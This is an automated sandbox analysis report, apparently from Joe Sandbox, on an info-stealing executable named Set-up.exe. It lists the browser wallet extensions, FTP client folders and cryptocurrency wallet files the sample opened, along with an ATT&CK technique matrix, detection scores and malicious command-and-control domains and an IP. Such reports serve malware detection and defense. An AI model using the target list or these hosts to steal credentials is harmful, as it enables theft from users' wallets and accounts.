              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
              Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1841233829.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1840272460.0000000000DD2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 7104, type: MEMORYSTR
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
ATT&CK Matrix, listed by tactic (a number preceding a technique is kept exactly as it appears in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 12 Windows Management Instrumentation; 2 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 21 Virtualization/Sandbox Evasion; 1 Deobfuscate/Decode Files or Information; 1 DLL Side-Loading; Binary Padding; Software Packing; Steganography
Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 1 Query Registry; 221 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 1 Process Discovery; 1 File and Directory Discovery; 22 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 41 Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 113 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source: Set-up.exe | Detection: 7% | Scanner: Virustotal
Source: Set-up.exe | Detection: 13% | Scanner: ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
Source: marketlumpe.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: nuttyshopr.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/(8Y | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/apil7 | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: grandiouseziu.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/ | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/apiC8Yg | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/:3ODr | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://www.freetype.org/ttfautohint | Detection: 0% | Scanner: Avira URL Cloud | Label: safe
Source: https://rampnatleadk.click/api | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: littlenotii.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/apiK | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/I8Xl | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click:443/api | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/9 | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: rampnatleadk.click | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: spookycappy.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: truculengisau.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: fraggielek.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: punishzement.biz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Source: https://rampnatleadk.click/apiz | Detection: 100% | Scanner: Avira URL Cloud | Label: malware
Name: rampnatleadk.click | IP: 172.67.139.144 | Active: true | Malicious: true | Antivirus Detection: none listed | Reputation: unknown

Name: nuttyshopr.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: marketlumpe.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: grandiouseziu.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://rampnatleadk.click/api | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: littlenotii.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: spookycappy.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: truculengisau.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: rampnatleadk.click | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: fraggielek.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: punishzement.biz | Malicious: true | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://duckduckgo.com/chrome_newtab | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://duckduckgo.com/ac/?q= | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://www.google.com/images/branding/product/ico/googleg_lodp.ico | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/(8Y | Source: Set-up.exe, 00000000.00000002.1910542741.0000000000D78000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://rampnatleadk.click/apil7 | Source: Set-up.exe, 00000000.00000003.1841233829.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864166986.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1857255847.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/:3ODr | Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://rampnatleadk.click/apiC8Yg | Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://crl.rootca1.amazontrust.com/rootca1.crl0 | Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://ocsp.rootca1.amazontrust.com0: | Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | Source: Set-up.exe, 00000000.00000003.1794627775.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782851723.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1783081057.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782712260.0000000003F60000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1794468638.0000000003F59000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://www.ecosia.org/newtab/ | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/ | Source: Set-up.exe, 00000000.00000003.1852213854.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: http://gcc.gnu.org/bugs.html): | Source: Set-up.exe | Malicious: false | Reputation: high
Name: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://crl.microsoft. | Source: Set-up.exe, 00000000.00000002.1910542741.0000000000DAC000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://www.freetype.org/ttfautohint | Source: Set-up.exe | Malicious: false | Antivirus Detection: Avira URL Cloud: safe | Reputation: unknown
Name: https://ac.ecosia.org/autocomplete?q= | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/I8Xl | Source: Set-up.exe, 00000000.00000002.1910795263.0000000000DE0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://rampnatleadk.click:443/api | Source: Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864394306.0000000000DD0000.00000004.00000020.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | Source: Set-up.exe, 00000000.00000003.1807390746.0000000003F01000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://x1.c.lencr.org/0 | Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://x1.i.lencr.org/0 | Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://support.microsof | Source: Set-up.exe, 00000000.00000003.1782712260.0000000003F62000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: http://crt.rootca1.amazontrust.com/rootca1.cer0? | Source: Set-up.exe, 00000000.00000003.1805882594.0000000003F33000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/apiK | Source: Set-up.exe, 00000000.00000003.1794559739.0000000003F0C000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://rampnatleadk.click/9 | Source: Set-up.exe, 00000000.00000003.1835478387.0000000003F07000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1834001627.0000000003F06000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805472670.0000000003F01000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805998934.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1833979280.0000000003F02000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806263294.0000000003F06000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
Name: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples | Source: Set-up.exe, 00000000.00000003.1782851723.0000000003F34000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://support.mozilla.org/products/firefoxgro.all | Source: Set-up.exe, 00000000.00000003.1807035389.0000000004021000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | Source: Set-up.exe, 00000000.00000003.1782401428.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782310827.0000000003F4B000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1782221768.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Reputation: high
Name: https://rampnatleadk.click/apiz | Source: Set-up.exe, 00000000.00000003.1833921663.0000000003F0A000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806991177.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805384068.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1851850249.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1805882594.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1864327284.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1909389621.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1911159958.0000000003F12000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1840080903.0000000003F10000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1806237333.0000000003F10000.00000004.00000800.00020000.00000000.sdmp | Malicious: false | Antivirus Detection: Avira URL Cloud: malware | Reputation: unknown
IP: 172.67.139.144 | Domain: rampnatleadk.click | Country: United States | ASN: 13335 | ASN Name: CLOUDFLARENETUS | Malicious: true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589443
Start date and time: 2025-01-12 15:19:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 40s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Set-up.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time: 09:20:13 | Type: API Interceptor | Description: 8x Sleep call for process: Set-up.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name
172.67.139.144 | ATT00001.html | malicious | HTMLPhisher
172.67.139.144 | csrss.exe | malicious | Metasploit
172.67.139.144 | rlavBKPBEc.exe | malicious | Metasploit
172.67.139.144 | 1dyvctHqv1.exe | malicious | Metasploit
172.67.139.144 | 4t4y4r89UZ.exe | malicious | Metasploit
172.67.139.144 | 0NlSa5bf55.exe | malicious | Metasploit
172.67.139.144 | f6oNLRKHUy.exe | malicious | Metasploit
172.67.139.144 | jkDmft1Qoe.exe | malicious | Metasploit
Match (domain) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
rampnatleadk.click | random.exe | malicious | LummaC Stealer | 104.21.79.9
Match (ASN) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
CLOUDFLARENETUS | PDF-523.msi | malicious | AteraAgent | 104.18.18.106
CLOUDFLARENETUS | E6wUHnV51P.exe | malicious | DCRat | 104.21.12.142
CLOUDFLARENETUS | gem2.exe | malicious | Unknown | 104.21.64.1
CLOUDFLARENETUS | gem1.exe | malicious | CredGrabber, Meduza Stealer | 104.26.12.205
CLOUDFLARENETUS | 176.113.115.170.ps1 | malicious | LummaC | 172.67.160.193
CLOUDFLARENETUS | https://accountsupporthub.es/generate/Login/ | malicious | Unknown | 104.21.90.106
CLOUDFLARENETUS | Solara.exe | malicious | Python Stealer, Exela Stealer, Xmrig | 162.159.134.233
CLOUDFLARENETUS | resembleC2.exe | malicious | Blank Grabber, Umbral Stealer | 162.159.135.232
CLOUDFLARENETUS | Bootstrapper.exe | malicious | LummaC | 172.67.219.181
CLOUDFLARENETUS | http://steam.usercommunityart.com/filedetails/sharedfiles/id=319248110/ | malicious | Unknown | 104.21.56.69
Match (JA3) | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
